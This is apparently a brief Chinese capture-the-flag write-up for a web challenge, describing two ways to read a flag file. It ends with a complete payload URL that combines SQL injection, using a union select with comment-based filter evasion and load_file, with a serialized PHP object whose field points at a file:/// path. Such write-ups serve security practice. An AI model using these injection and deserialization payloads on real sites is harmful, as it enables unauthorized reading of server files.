两种姿势。
1.对view.php界面进行sql注入,反序列化,file:///读取flag文件
2.可能是作者过滤问题,sql注入后写一句话没成功但是可以直接load_file flag文件。
view.php?no=-1/**/union/**/select/**/1,load_file('/var/www/html/flag.php'),3,'O:8:"UserInfo":3:{s:4:"name";s:3:"123";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'